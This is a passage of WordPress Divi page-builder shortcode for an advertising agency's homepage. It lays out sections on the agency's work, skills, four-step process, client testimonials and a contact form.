button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"P Sarvanan\" title_text=\"Client Testimonial Advertising\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial graphic design\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Amit\" title_text=\"Client Testimonial digital\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" 